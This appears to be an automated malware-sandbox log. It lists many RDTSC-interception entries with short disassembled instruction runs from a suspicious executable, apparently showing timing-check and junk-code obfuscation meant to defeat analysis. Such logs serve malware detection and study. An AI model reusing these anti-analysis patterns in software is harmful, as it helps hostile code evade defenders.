Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 110A4DE second address: 110A50F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1C29045F0Ah 0x00000009 jmp 00007F1C29045F18h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007F1C29045F06h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 110A50F second address: 110A513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 110A513 second address: 110A523 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jno 00007F1C29045F06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 110A523 second address: 110A527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 110A527 second address: 110A530 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 110A530 second address: 110A536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 110A536 second address: 110A550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F1C29045F06h 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 jne 00007F1C29045F06h 0x00000016 pop eax 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 110A7E5 second address: 110A7F3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F1C28FAFD6Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 110A7F3 second address: 110A7F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 110E5D5 second address: 110E608 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jmp 00007F1C28FAFD71h 0x0000000f pop edi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 110E608 second address: 110E616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 110DD46 second address: 110DD4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 110DD4C second address: 110DD50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 110E2D6 second address: 110E2E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F1C28FAFD66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 110E2E0 second address: 110E2E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 110E2E6 second address: 110E30D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F1C28FAFD79h 0x0000000c jnp 00007F1C28FAFD66h 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1112902 second address: 1112915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b ja 00007F1C29045F08h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1112A5D second address: 1112A6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnp 00007F1C28FAFD6Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1112A6A second address: 1112A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1112A74 second address: 1112A7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F1C28FAFD66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1112A7E second address: 1112A82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1112BE1 second address: 1112BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1C28FAFD6Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1112BF3 second address: 1112C02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F1C29045F06h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1112D6C second address: 1112D70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B648E second address: 10B6494 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B6494 second address: 10B6521 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F1C28FAFD66h 0x00000009 jne 00007F1C28FAFD66h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 jno 00007F1C28FAFD70h 0x00000019 nop 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007F1C28FAFD68h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 0000001Ch 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 mov ebx, dword ptr [ebp+1247D5D6h] 0x0000003a sub di, 2400h 0x0000003f movsx edi, cx 0x00000042 add eax, ebx 0x00000044 push 00000000h 0x00000046 push esi 0x00000047 call 00007F1C28FAFD68h 0x0000004c pop esi 0x0000004d mov dword ptr [esp+04h], esi 0x00000051 add dword ptr [esp+04h], 0000001Ah 0x00000059 inc esi 0x0000005a push esi 0x0000005b ret 0x0000005c pop esi 0x0000005d ret 0x0000005e mov ecx, dword ptr [ebp+122D1BBBh] 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007F1C28FAFD6Ah 0x0000006c rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B6521 second address: 10B6577 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1C29045F11h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 pushad 0x00000011 mov esi, dword ptr [ebp+122D353Dh] 0x00000017 push edi 0x00000018 jmp 00007F1C29045F11h 0x0000001d pop edx 0x0000001e popad 0x0000001f push 00000004h 0x00000021 mov dword ptr [ebp+122D2D6Fh], ebx 0x00000027 nop 0x00000028 push ecx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F1C29045F13h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B6577 second address: 10B6599 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD6Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1C28FAFD6Bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1119DC8 second address: 1119DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1C29045F17h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e push edi 0x0000000f jne 00007F1C29045F06h 0x00000015 pushad 0x00000016 popad 0x00000017 pop edi 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push edi 0x0000001c push ebx 0x0000001d pop ebx 0x0000001e pushad 0x0000001f popad 0x00000020 pop edi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1119F48 second address: 1119F4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1119F4E second address: 1119F79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 ja 00007F1C29045F21h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007F1C29045F19h 0x00000012 pushad 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1119F79 second address: 1119F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 111A278 second address: 111A288 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F1C29045F06h 0x0000000a jbe 00007F1C29045F06h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 111A860 second address: 111A866 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 111A866 second address: 111A86A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 111B137 second address: 111B13B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 111B13B second address: 111B173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F1C29045F0Eh 0x0000000c jp 00007F1C29045F06h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F1C29045F10h 0x0000001d pop edx 0x0000001e popad 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 111B173 second address: 111B177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 111B177 second address: 111B17B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 111B17B second address: 111B1A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F1C28FAFD75h 0x0000000c jmp 00007F1C28FAFD6Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1C28FAFD6Eh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 111B45A second address: 111B45F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 111F8B2 second address: 111F8B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 111EA8F second address: 111EAAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1C29045F14h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 111EBD6 second address: 111EBDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 111EE62 second address: 111EE82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F1C29045F16h 0x0000000a pop edi 0x0000000b push esi 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 111EE82 second address: 111EE88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 111F28F second address: 111F293 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 111F293 second address: 111F29F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 111F3E5 second address: 111F428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1C29045F0Eh 0x00000009 pushad 0x0000000a jmp 00007F1C29045F0Bh 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jmp 00007F1C29045F15h 0x00000016 popad 0x00000017 popad 0x00000018 pushad 0x00000019 pushad 0x0000001a jp 00007F1C29045F06h 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 111F428 second address: 111F436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F1C28FAFD66h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 111F5E6 second address: 111F5EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 111F5EB second address: 111F60D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD6Eh 0x00000007 push ecx 0x00000008 jmp 00007F1C28FAFD6Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 112E5C5 second address: 112E5CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 112CFB6 second address: 112CFC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1C28FAFD6Ah 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 112CFC7 second address: 112CFE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jl 00007F1C29045F06h 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F1C29045F0Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 112D5C3 second address: 112D5CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1133BE4 second address: 1133BEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1141F42 second address: 1141F46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1141F46 second address: 1141F4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 11450E1 second address: 11450EB instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1C28FAFD6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 11450EB second address: 11450F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F1C29045F0Eh 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 11450F9 second address: 1145104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1145104 second address: 1145120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F1C29045F15h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1144D0F second address: 1144D25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007F1C28FAFD91h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jg 00007F1C28FAFD66h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 11535B1 second address: 11535C0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1C29045F06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1155F9D second address: 1155FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1C28FAFD75h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 115D49E second address: 115D4A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 115D922 second address: 115D941 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1C28FAFD7Ah 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F1C28FAFD72h 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1162EF4 second address: 1162F13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F1C29045F06h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jnl 00007F1C29045F12h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1162F13 second address: 1162F19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1162F19 second address: 1162F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1162F1F second address: 1162F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1165864 second address: 116586A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 116586A second address: 116586F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1168F1A second address: 1168F37 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F1C29045F18h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 11B4796 second address: 11B479A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 11B68A0 second address: 11B68A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 127B01F second address: 127B023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 127B023 second address: 127B027 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 127B027 second address: 127B02D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 127B185 second address: 127B18D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 127BB70 second address: 127BB7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop esi 0x00000006 push ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 127BB7A second address: 127BB80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 127BB80 second address: 127BB89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 127D6F9 second address: 127D712 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1C29045F0Fh 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 127D712 second address: 127D741 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F1C28FAFD72h 0x0000000f jmp 00007F1C28FAFD6Ch 0x00000014 jnc 00007F1C28FAFD66h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 128007B second address: 128009B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F16h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 128009B second address: 128009F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 12802F4 second address: 12802F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 1281A15 second address: 1281A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
